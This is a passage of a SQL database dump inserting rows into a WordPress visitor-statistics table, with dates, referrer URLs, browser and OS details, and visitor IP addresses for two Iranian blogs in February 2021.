(8984,'2021-02-14','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','181.36.230.245','000',0,2,0),
(8985,'2021-02-14','https://lite.qwant.com/','Firefox','Linux','Unknown',NULL,NULL,'','84.145.176.20','000',0,1,0),
(8986,'2021-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.95.194','000',0,1,0),
(8987,'2021-02-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8988,'2021-02-14','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.245.202.112','000',0,1,0),
(8989,'2021-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.38.244.145','000',0,1,0),
(8990,'2021-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8991,'2021-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(8992,'2021-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8993,'2021-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8994,'2021-02-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.245.84.100','000',0,2,0),
(8995,'2021-02-14','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','177.55.242.44','000',0,2,0),
(8996,'2021-02-14','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','89.238.191.174','000',0,2,0),
(8997,'2021-02-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','85.247.217.181','000',0,1,0),
(8998,'2021-02-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','83.28.5.135','000',0,11,0),
(8999,'2021-02-15','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.134.52.166','000',0,4,0),
(9000,'2021-02-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(9001,'2021-02-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.49.229.197','000',0,1,0),
(9002,'2021-02-15','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','192.145.127.76','000',0,2,0),
(9003,'2021-02-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.39','000',0,1,0),
(9004,'2021-02-15','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','95.49.190.122','000',0,5,0),
(9005,'2021-02-15','http://design-arena.ir/blog','Safari','iOS','12.0',NULL,NULL,'','192.36.248.249','000',0,1,0),
(9006,'2021-02-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','123.178.150.230','000',0,3,0),
(9007,'2021-02-15','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','103.208.152.36','000',0,2,0),
(9008,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','174.73.165.109','000',0,1,0),
(9009,'2021-02-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','135.148.33.94','000',0,1,0),
(9010,'2021-02-15','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','89.238.191.174','000',0,2,0),
(9011,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.128.60','000',0,1,0),
(9012,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.129.40.71','000',0,2,0),
(9013,'2021-02-15','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','116.99.224.242','000',0,2,0),
(9014,'2021-02-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9015,'2021-02-15','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','195.206.183.82','000',0,2,0),
(9016,'2021-02-15','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,1,0),
(9017,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.209.166','000',0,1,0),
(9018,'2021-02-15','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','51.254.204.117','000',0,2,0),
(9019,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.121.241','000',0,1,0),
(9020,'2021-02-15','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.188.115.117','000',0,1,0),
(9021,'2021-02-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','202.142.68.131','000',0,1,0),
(9022,'2021-02-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','84.247.50.60','000',0,2,0),
(9023,'2021-02-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','178.79.162.164','000',0,1,0),
(9024,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.46.144.138','000',0,2,0),
(9025,'2021-02-15','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','200.9.67.9','000',0,2,0),
(9026,'2021-02-15','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','80.82.68.201','000',0,1,0),
(9027,'2021-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(9028,'2021-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(9029,'2021-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9030,'2021-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9031,'2021-02-15','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','194.35.233.135','000',0,2,0),
(9032,'2021-02-15','http://design-arena.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','51.159.36.102','000',0,1,0),
(9033,'2021-02-15','http://ictbank.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','51.159.36.128','000',0,1,0),
(9034,'2021-02-15','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','106.75.52.88','000',0,5,0),
(9035,'2021-02-15','http://ictbank.ir/','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.203','000',0,1,0),
(9036,'2021-02-15','http://ictbank.ir/blog/wp-comments-post.php','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.232','000',0,1,0),
(9037,'2021-02-15','http://www.ictbank.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','51.159.37.26','000',0,2,0),
(9038,'2021-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.28.187.197','000',0,1,0),
(9039,'2021-02-16','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','37.120.156.84','000',0,2,0),
(9040,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.163.62.221','000',0,1,0),
(9041,'2021-02-16','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','180.232.87.50','000',0,2,0),
(9042,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.102.4','000',0,1,0),
(9043,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.178.43.209','000',0,1,0),
(9044,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','177.92.44.122','000',0,1,0),
(9045,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','85.214.244.174','000',0,1,0),
(9046,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','200.122.202.108','000',0,1,0),
(9047,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.216.132.241','000',0,1,0),
(9048,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','152.0.217.18','000',0,1,0),
(9049,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.230.199.45','000',0,1,0),
(9050,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','200.88.168.17','000',0,1,0),
(9051,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.126.36.230','000',0,1,0),
(9052,'2021-02-16','http://ictbank.ir/blog','Instagram','Android','8.0.0',NULL,NULL,'','185.216.35.121','000',0,2,0),
(9053,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.18.196.143','000',0,1,0),
(9054,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','200.60.170.154','000',0,1,0),
(9055,'2021-02-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9056,'2021-02-16','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','124.105.107.252','000',0,2,0),
(9057,'2021-02-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(9058,'2021-02-16','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','71.59.156.76','000',0,1,0),
(9059,'2021-02-16','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.122.104.12','000',0,2,0),
(9060,'2021-02-16','http://ictbank.ir/blog','Android Browser','Android','7.1.2',NULL,NULL,'','185.220.70.211','000',0,2,0),
(9061,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.74.176','000',0,1,0),
(9062,'2021-02-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.190.156.53','000',0,1,0),
(9063,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.199.83.161','000',0,1,0),
(9064,'2021-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9065,'2021-02-16','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','190.80.187.170','000',0,1,0),
(9066,'2021-02-16','http://schuvartsautopecas.com.br/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','186.7.241.250','000',0,1,0),
(9067,'2021-02-16','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.191.220.1','000',0,1,0),
(9068,'2021-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.55.2','000',0,1,0),
(9069,'2021-02-16','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','172.255.125.168','000',0,4,0),
(9070,'2021-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(9071,'2021-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(9072,'2021-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(9073,'2021-02-16','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','91.60.220.136','000',0,1,0),
(9074,'2021-02-16','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','88.250.120.3','000',0,2,0),
(9075,'2021-02-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.245.188.175','000',0,4,0),
(9076,'2021-02-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.185.241.102','000',0,2,0),
(9077,'2021-02-17','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','1.179.131.169','000',0,2,0),
(9078,'2021-02-17','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','46.5.253.98','000',0,2,0),
(9079,'2021-02-17','http://ictbank.ir/blog','Unknown','Android','7.1.2',NULL,NULL,'','217.146.82.142','000',0,2,0),
(9080,'2021-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.163.101.147','000',0,3,0),
(9081,'2021-02-17','http://82.102.9.14/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.165.168.168','000',0,1,0),
(9082,'2021-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.126.44','000',0,1,0),
(9083,'2021-02-17','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.144.165.4','000',0,2,0),
(9084,'2021-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(9085,'2021-02-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','27.184.92.163','000',0,1,0),
(9086,'2021-02-17','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','190.121.131.101','000',0,2,0),
(9087,'2021-02-17','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.232.188.105','000',0,1,0),
(9088,'2021-02-17','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','218.23.196.194','000',0,1,0),
(9089,'2021-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.222.149','000',0,1,0),
(9090,'2021-02-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9091,'2021-02-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.68.75','000',0,18,0),
(9092,'2021-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,2,0),
(9093,'2021-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(9094,'2021-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9095,'2021-02-17','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','185.151.125.197','000',0,1,0);
INSERT INTO `wp_statistics_visitor` VALUES
(9096,'2021-02-17','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','101.127.224.0','000',0,2,0),
(9097,'2021-02-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.39','000',0,1,0),
(9098,'2021-02-18','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','42.225.43.224','000',0,2,0),
(9099,'2021-02-18','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','113.160.166.49','000',0,2,0),
(9100,'2021-02-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9101,'2021-02-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9102,'2021-02-18','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','64.227.7.250','000',0,1,0),
(9103,'2021-02-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.157.2','000',0,1,0),
(9104,'2021-02-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9105,'2021-02-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','172.94.9.37','000',0,87,0),
(9106,'2021-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.87.77','000',0,1,0),
(9107,'2021-02-18','https://www.google.com/','Chrome','Android','10',NULL,NULL,'','92.40.170.47','000',0,1,0),
(9108,'2021-02-18','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','5.45.67.25','000',0,1,0),
(9109,'2021-02-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.252.146.112','000',0,1,0),
(9110,'2021-02-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','88.80.188.96','000',0,1,0),
(9111,'2021-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.98.103.84','000',0,2,0),
(9112,'2021-02-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','34.204.187.136','000',0,1,0),
(9113,'2021-02-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(9114,'2021-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9115,'2021-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9116,'2021-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(9117,'2021-02-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','119.45.189.18','000',0,3,0),
(9118,'2021-02-18','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','106.52.58.81','000',0,2,0),
(9119,'2021-02-19','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','185.236.42.31','000',0,2,0),
(9120,'2021-02-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(9121,'2021-02-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','23.129.64.202','000',0,1,0),
(9122,'2021-02-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.157.2','000',0,1,0),
(9123,'2021-02-19','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(9124,'2021-02-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(9125,'2021-02-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','221.213.75.11','000',0,1,0),
(9126,'2021-02-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.14.124','000',0,1,0),
(9127,'2021-02-19','http://82.102.9.14/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','118.220.54.202','000',0,1,0),
(9128,'2021-02-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9129,'2021-02-19','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','72.11.157.124','000',0,2,0),
(9130,'2021-02-19','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.207.249.125','000',0,1,0),
(9131,'2021-02-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.33.82','000',0,1,0),
(9132,'2021-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(9133,'2021-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(9134,'2021-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9135,'2021-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9136,'2021-02-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9137,'2021-02-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.248.172.16','000',0,1,0),
(9138,'2021-02-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9139,'2021-02-20','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','5.45.67.25','000',0,1,0),
(9140,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','42.112.30.70','000',0,1,0),
(9141,'2021-02-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.35','000',0,1,0),
(9142,'2021-02-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.24','000',0,2,0),
(9143,'2021-02-20','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','189.105.76.221','000',0,1,0),
(9144,'2021-02-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.14','000',0,2,0),
(9145,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(9146,'2021-02-20','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','50.246.13.230','000',0,1,0),
(9147,'2021-02-20','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','154.73.21.5','000',0,1,0),
(9148,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.225.223','000',0,1,0),
(9149,'2021-02-20','https://duckduckgo.com/','Chrome','Android','11',NULL,NULL,'','190.2.138.14','000',0,2,0),
(9150,'2021-02-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.177.180.148','000',0,1,0),
(9151,'2021-02-20','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','143.244.56.137','000',0,1,0),
(9152,'2021-02-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9153,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.31.229','000',0,1,0),
(9154,'2021-02-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','192.145.127.172','000',0,2,0),
(9155,'2021-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(9156,'2021-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(9157,'2021-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9158,'2021-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9159,'2021-02-20','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','152.89.163.92','000',0,2,0),
(9160,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.99.130','000',0,1,0),
(9161,'2021-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.203.118.96','000',0,2,0),
(9162,'2021-02-20','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','77.243.177.54','000',0,2,0),
(9163,'2021-02-20','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','170.254.83.38','000',0,2,0),
(9164,'2021-02-21','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.155.33.163','000',0,1,0),
(9165,'2021-02-21','http://ictbank.ir/blog','Chrome','Android','4.4.2',NULL,NULL,'','45.83.91.212','000',0,4,0),
(9166,'2021-02-21','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.200.244.177','000',0,1,0),
(9167,'2021-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.145.127.244','000',0,2,0),
(9168,'2021-02-21','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(9169,'2021-02-21','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','117.20.70.171','000',0,1,0),
(9170,'2021-02-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,21,0),
(9171,'2021-02-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,21,0),
(9172,'2021-02-21','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','113.109.161.220','000',0,1,0),
(9173,'2021-02-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','5.180.62.37','000',0,2,0),
(9174,'2021-02-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','86.106.103.103','000',0,2,0),
(9175,'2021-02-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9176,'2021-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.98.243','000',0,2,0),
(9177,'2021-02-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9178,'2021-02-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','178.239.173.188','000',0,2,0),
(9179,'2021-02-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.223.127.151','000',0,12,0),
(9180,'2021-02-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','45.12.223.84','000',0,2,0),
(9181,'2021-02-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(9182,'2021-02-21','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','211.226.212.88','000',0,2,0),
(9183,'2021-02-21','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.188.28.42','000',0,1,0),
(9184,'2021-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.217.178','000',0,1,0),
(9185,'2021-02-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(9186,'2021-02-21','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','212.103.50.44','000',0,2,0),
(9187,'2021-02-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.39','000',0,1,0),
(9188,'2021-02-21','http://ictbank.ir/blog','Instagram','iOS','12.0',NULL,NULL,'','194.110.84.111','000',0,2,0),
(9189,'2021-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.31.229','000',0,1,0),
(9190,'2021-02-21','http://ictbank.ir/blog','Facebook Messenger','Android','7.0',NULL,NULL,'','45.141.152.28','000',0,2,0),
(9191,'2021-02-21','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,1,0),
(9192,'2021-02-21','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','24.251.120.135','000',0,2,0),
(9193,'2021-02-21','https://duckduckgo.com/','Safari','OS X','10.15.6',NULL,NULL,'','80.151.63.6','000',0,2,0),
(9194,'2021-02-21','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','3.250.7.242','000',0,1,0),
(9195,'2021-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9196,'2021-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(9197,'2021-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9198,'2021-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9199,'2021-02-21','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','195.206.183.167','000',0,2,0),
(9200,'2021-02-21','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','195.206.169.231','000',0,2,0),
(9201,'2021-02-21','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','109.70.144.27','000',0,2,0),
(9202,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.235.138.214','000',0,1,0),
(9203,'2021-02-22','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','45.12.223.84','000',0,2,0),
(9204,'2021-02-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(9205,'2021-02-22','https://www.google.com','Opera','Windows','6.3',NULL,NULL,'','34.197.193.128','000',0,1,0),
(9206,'2021-02-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9207,'2021-02-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','86.106.103.103','000',0,2,0),
